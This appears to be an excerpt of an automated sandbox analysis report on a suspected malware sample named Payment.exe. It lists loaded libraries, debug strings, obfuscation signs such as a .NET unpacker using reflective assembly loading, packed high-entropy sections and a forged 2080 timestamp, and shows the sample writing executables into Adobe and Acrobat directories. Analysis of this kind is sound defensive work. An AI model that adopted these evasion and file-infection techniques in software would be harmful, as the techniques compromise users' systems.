Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll

Source: C:\Users\user\Desktop\Payment.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\Payment.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\Payment.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: Payment.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Payment.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: Payment.exe

Static file information: File size 1285120 > 1048576

Source: Payment.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x139200

Source: Payment.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: Payment.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: elevation_service.exe, 00000011.00000003.1805106051.0000000000730000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000011.00000003.1805057918.00000000007C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\ktab_objs\ktab.pdb source: elevation_service.exe, 00000011.00000003.1848948951.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: vssvc.pdb source: WBEngine.0.etl.34.dr
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\jjs_objs\jjs.pdb source: elevation_service.exe, 00000011.00000003.1846801591.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mavinject32.pdbGCTL source: elevation_service.exe, 00000011.00000003.1809550980.0000000001460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PresentationFontCache.pdb source: elevation_service.exe, 00000011.00000003.1763004881.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\pack200_objs\pack200.pdb source: elevation_service.exe, 00000011.00000003.1849948590.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: _.pdb source: Payment.exe, 00000008.00000002.2149738780.0000000003C40000.00000004.08000000.00040000.00000000.sdmp, Payment.exe, 00000008.00000002.2146723496.0000000003898000.00000004.00000020.00020000.00000000.sdmp, Payment.exe, 00000008.00000002.2124505788.0000000001212000.00000004.00000020.00020000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2134571739.000000000368F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmiregistry_objs\rmiregistry.pdb source: elevation_service.exe, 00000011.00000003.1851754548.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\e\src\out\Release_x64\notification_helper.exe.pdb source: notification_click_helper.exe.8.dr
Source:	Binary string: D:\a\_work\e\src\out\Release_x64\ie_to_edge_stub.exe.pdbOGP source: ie_to_edge_stub.exe.8.dr
Source:	Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: elevation_service.exe, 00000011.00000003.1808047986.00000000008C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\tnameserv_objs\tnameserv.pdb source: elevation_service.exe, 00000011.00000003.1853173657.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: elevation_service.exe, 00000011.00000003.1795189498.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\servertool_objs\servertool.pdb source: elevation_service.exe, 00000011.00000003.1852312433.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: vcVJ.pdb source: Payment.exe
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\javacplexec\obj\javacpl.pdb source: javacpl.exe.8.dr
Source:	Binary string: locator.pdb source: Locator.exe.8.dr
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AdobeCollabSync.pdb# source: AdobeCollabSync.exe.8.dr
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmid_objs\rmid.pdb source: elevation_service.exe, 00000011.00000003.1851271062.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java-rmi_objs\java-rmi.pdb source: elevation_service.exe, 00000011.00000003.1844334067.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wbengine.pdb source: WBEngine.0.etl.34.dr
Source:	Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: elevation_service.exe, 00000011.00000003.1805106051.0000000000730000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000011.00000003.1805057918.00000000007C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\javacplexec\obj\javacpl.pdb774 source: javacpl.exe.8.dr
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java_objs\java.pdb source: java.exe.8.dr
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\keytool_objs\keytool.pdb source: elevation_service.exe, 00000011.00000003.1847561680.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\e\src\out\Release_x64\ie_to_edge_stub.exe.pdb source: ie_to_edge_stub.exe.8.dr
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\jjs_objs\jjs.pdb source: elevation_service.exe, 00000011.00000003.1846801591.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mavinject32.pdb source: elevation_service.exe, 00000011.00000003.1809550980.0000000001460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\policytool_objs\policytool.pdb source: elevation_service.exe, 00000011.00000003.1850530432.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: elevation_service.exe, 00000011.00000003.1808047986.00000000008C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmid_objs\rmid.pdb source: elevation_service.exe, 00000011.00000003.1851271062.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\policytool_objs\policytool.pdb source: elevation_service.exe, 00000011.00000003.1850530432.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\servertool_objs\servertool.pdb source: elevation_service.exe, 00000011.00000003.1852312433.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\keytool_objs\keytool.pdb source: elevation_service.exe, 00000011.00000003.1847561680.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ifsutil.pdb source: WBEngine.0.etl.34.dr
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\klist_objs\klist.pdb source: elevation_service.exe, 00000011.00000003.1848431203.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\tnameserv_objs\tnameserv.pdb source: elevation_service.exe, 00000011.00000003.1853173657.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\ktab_objs\ktab.pdb source: elevation_service.exe, 00000011.00000003.1848948951.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: notification_helper.exe.pdb source: notification_helper.exe.8.dr
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java-rmi_objs\java-rmi.pdb source: elevation_service.exe, 00000011.00000003.1844334067.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: elevation_service.exe, 00000011.00000003.1795189498.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: udfs.pdb source: WBEngine.0.etl.34.dr
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\kinit_objs\kinit.pdb source: elevation_service.exe, 00000011.00000003.1847956635.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\e\src\out\Release_x64\notification_helper.exe.pdbOGP source: notification_click_helper.exe.8.dr
Source:	Binary string: uudf.pdb source: WBEngine.0.etl.34.dr
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\orbd_objs\orbd.pdb source: elevation_service.exe, 00000011.00000003.1849458502.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\pack200_objs\pack200.pdb source: elevation_service.exe, 00000011.00000003.1849948590.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmiregistry_objs\rmiregistry.pdb source: elevation_service.exe, 00000011.00000003.1851754548.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: vcVJ.pdbSHA256& source: Payment.exe
Source:	Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: elevation_service.exe, 00000011.00000003.1763004881.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: locator.pdbGCTL source: Locator.exe.8.dr
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\klist_objs\klist.pdb source: elevation_service.exe, 00000011.00000003.1848431203.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\kinit_objs\kinit.pdb source: elevation_service.exe, 00000011.00000003.1847956635.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\orbd_objs\orbd.pdb source: elevation_service.exe, 00000011.00000003.1849458502.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: default-browser-agent.pdb source: default-browser-agent.exe.8.dr
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AdobeCollabSync.pdb source: AdobeCollabSync.exe.8.dr
Source:	Binary string: vssapi.pdb source: WBEngine.0.etl.34.dr
Source:	Binary string: spp.pdb source: WBEngine.0.etl.34.dr

Data Obfuscation

.NET source code contains potential unpacker

Source: 0.2.Payment.exe.5570000.2.raw.unpack, dTuvtD1DdyQbwj9dR3.cs

.Net Code: CP08EDIlFp4tShm7sYs System.Reflection.Assembly.Load(byte[])

Source: Payment.exe

Static PE information: 0xCF582113 [Tue Mar 26 06:15:47 2080 UTC]

Source: C:\Users\user\Desktop\Payment.exe

Code function: 8_2_00402000 LoadLibraryA,GetProcAddress,LdrInitializeThunk,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,

8_2_00402000

Source: pingsender.exe.8.dr	Static PE information: section name: .00cfg
Source: pingsender.exe.8.dr	Static PE information: section name: .voltbl
Source: plugin-container.exe.8.dr	Static PE information: section name: .00cfg
Source: plugin-container.exe.8.dr	Static PE information: section name: .voltbl
Source: private_browsing.exe.8.dr	Static PE information: section name: .00cfg
Source: private_browsing.exe.8.dr	Static PE information: section name: .voltbl
Source: updater.exe.8.dr	Static PE information: section name: .00cfg
Source: updater.exe.8.dr	Static PE information: section name: .voltbl
Source: updater.exe.8.dr	Static PE information: section name: _RDATA
Source: armsvc.exe.8.dr	Static PE information: section name: .didat
Source: alg.exe.8.dr	Static PE information: section name: .didat
Source: FXSSVC.exe.8.dr	Static PE information: section name: .didat
Source: elevation_service.exe.8.dr	Static PE information: section name: .gxfg
Source: elevation_service.exe.8.dr	Static PE information: section name: .retplne
Source: elevation_service.exe.8.dr	Static PE information: section name: _RDATA
Source: updater.exe0.8.dr	Static PE information: section name: CPADinfo
Source: updater.exe0.8.dr	Static PE information: section name: malloc_h
Source: elevation_service.exe0.8.dr	Static PE information: section name: .00cfg
Source: elevation_service.exe0.8.dr	Static PE information: section name: .gxfg
Source: elevation_service.exe0.8.dr	Static PE information: section name: .retplne
Source: elevation_service.exe0.8.dr	Static PE information: section name: _RDATA
Source: elevation_service.exe0.8.dr	Static PE information: section name: malloc_h
Source: maintenanceservice.exe.8.dr	Static PE information: section name: .00cfg
Source: maintenanceservice.exe.8.dr	Static PE information: section name: .voltbl
Source: maintenanceservice.exe.8.dr	Static PE information: section name: _RDATA
Source: msdtc.exe.8.dr	Static PE information: section name: .didat
Source: msiexec.exe.8.dr	Static PE information: section name: .didat
Source: MsSense.exe.8.dr	Static PE information: section name: .didat
Source: unpack200.exe.8.dr	Static PE information: section name: .00cfg
Source: Spectrum.exe.8.dr	Static PE information: section name: .didat
Source: TieringEngineService.exe.8.dr	Static PE information: section name: .didat
Source: vds.exe.8.dr	Static PE information: section name: .didat
Source: VSSVC.exe.8.dr	Static PE information: section name: .didat

Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_052EDD75 push ebp; ret	0_2_052EDD81
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_052EDDA6 push ebp; ret	0_2_052EDDAD
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_052EDD8A push ebp; ret	0_2_052EDD91
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_052EDD82 push ebp; ret	0_2_052EDD89
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_052EDD9A push ebp; ret	0_2_052EDDA1
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_052EDD92 push ebp; ret	0_2_052EDD99
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0041C40C push cs; iretd	8_2_0041C4E2
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_00423149 push eax; ret	8_2_00423179
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0041C50E push cs; iretd	8_2_0041C4E2
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_004231C8 push eax; ret	8_2_00423179
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0040E21D push ecx; ret	8_2_0040E230
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0041C6BE push ebx; ret	8_2_0041C6BF
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_02E4E2F8 push 02E4DB41h; ret	8_2_02E4DBED
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_02E4E2F8 push 02E4E473h; ret	8_2_02E4E0FF
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_02E4E2F8 push 02E4E2EDh; ret	8_2_02E4E124
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_02E4E2F8 push 02E4DDBBh; ret	8_2_02E4E13E
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_02E4E2F8 push 02E4E2FBh; ret	8_2_02E4E243
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_02E4E2F8 push 02E4DE5Fh; ret	8_2_02E4E364
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_02E4A2B8 push 02E48728h; ret	8_2_02E48533
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_02E4A2B8 push 02E4897Bh; ret	8_2_02E48968
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_02E4A2B8 push 02E49B4Dh; ret	8_2_02E49AF8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_02E4A2B8 push 02E4A2E5h; ret	8_2_02E4A32D
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_02E4A2B8 push 02E49DE0h; ret	8_2_02E4A4F6
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_02E4A2B8 push 02E4A57Ah; ret	8_2_02E4A675
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_02E48286 push 02E45E00h; ret	8_2_02E45ECE
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_02E48286 push 02E46053h; ret	8_2_02E460F0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_02E48286 push 02E462CAh; ret	8_2_02E461A8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_02E48286 push 02E4635Fh; ret	8_2_02E461B2
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_02E48286 push 02E46334h; ret	8_2_02E461E8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_02E48286 push 02E4642Dh; ret	8_2_02E46305
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_02E48286 push 02E46463h; ret	8_2_02E46349

Source: Payment.exe	Static PE information: section name: .text entropy: 7.903766851207894
Source: jwBqGZseW.exe.0.dr	Static PE information: section name: .text entropy: 7.903766851207894
Source: Aut2exe.exe.8.dr	Static PE information: section name: .rsrc entropy: 7.800302950828862
Source: Aut2exe_x64.exe.8.dr	Static PE information: section name: .rsrc entropy: 7.800429394459221
Source: AppVClient.exe.8.dr	Static PE information: section name: .reloc entropy: 7.94301908113562
Source: AutoIt3_x64.exe.8.dr	Static PE information: section name: .reloc entropy: 7.950956486853016
Source: SciTE.exe.8.dr	Static PE information: section name: .reloc entropy: 7.91811475723973
Source: jucheck.exe.8.dr	Static PE information: section name: .reloc entropy: 7.937399784672375
Source: jusched.exe.8.dr	Static PE information: section name: .reloc entropy: 7.9425167056531905
Source: FXSSVC.exe.8.dr	Static PE information: section name: .reloc entropy: 7.949298739388325
Source: elevation_service.exe.8.dr	Static PE information: section name: .reloc entropy: 7.952031475381403
Source: updater.exe0.8.dr	Static PE information: section name: .reloc entropy: 7.884386899159848
Source: elevation_service.exe0.8.dr	Static PE information: section name: .reloc entropy: 7.952892988390758
Source: SensorDataService.exe.8.dr	Static PE information: section name: .reloc entropy: 7.942019523886895
Source: Spectrum.exe.8.dr	Static PE information: section name: .reloc entropy: 7.95233156787885
Source: AgentService.exe.8.dr	Static PE information: section name: .reloc entropy: 7.943788461553357
Source: vds.exe.8.dr	Static PE information: section name: .reloc entropy: 7.948062658447608
Source: VSSVC.exe.8.dr	Static PE information: section name: .reloc entropy: 7.946510544249622
Source: wbengine.exe.8.dr	Static PE information: section name: .reloc entropy: 7.94826362750618

Source: 0.2.Payment.exe.5570000.2.raw.unpack, P3eh8af2o4VTkSD0Y3.cs	High entropy of concatenated method names: 'Dispose', 'P3efh8a2o', 'yH8LT4C6bmLeWc8YL5', 'L4Ca6Xd2uZ8fu7tskX', 'DguxHGFPrqLRK6Jgbs', 'rGmoViKuA1CYkAIaDT', 'pSCfTfOip17KqF4YlD', 'FPnfDwDcQAmPdvY5g0', 'tTY1xtxACVStGqjdTk', 'B1WwFvRAyy9IRNc19V'
Source: 0.2.Payment.exe.5570000.2.raw.unpack, dTuvtD1DdyQbwj9dR3.cs	High entropy of concatenated method names: 'KYGvAvhTF', 'JFn7SRQet', 'ax2QgSfgc', 'g5OeQ68r3', 'a6IZjF0TE', 'UeGcOh08y', 'PKxX9EuHD', 'OcPJIHTlp', 'Ym7kCXKit', 'LsoLtyUhZ'
Source: 0.2.Payment.exe.5570000.2.raw.unpack, ihTFxFFnSRQetgx2gS.cs	High entropy of concatenated method names: 'ISrkpyii4tSUs', 'b50WjUTaChgUDI2NEVw', 'gQERmsTu2tA2TFSBlH8', 'rFnpM5TnkllvYULeG2c', 'vcFCwhTvUgN9tUBDaUO', 'frROXdT0dSL2FIpOj8j', 'zOHiqMTZkx59a1xMwqr'

Persistence and Installation Behavior

Creates files in the system32 config directory

Source: C:\Windows\System32\AppVClient.exe

File created: C:\Windows\system32\config\systemprofile\AppData\Roaming\89ead7124fd5c239.bin

Drops executable to a common third party application directory

Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
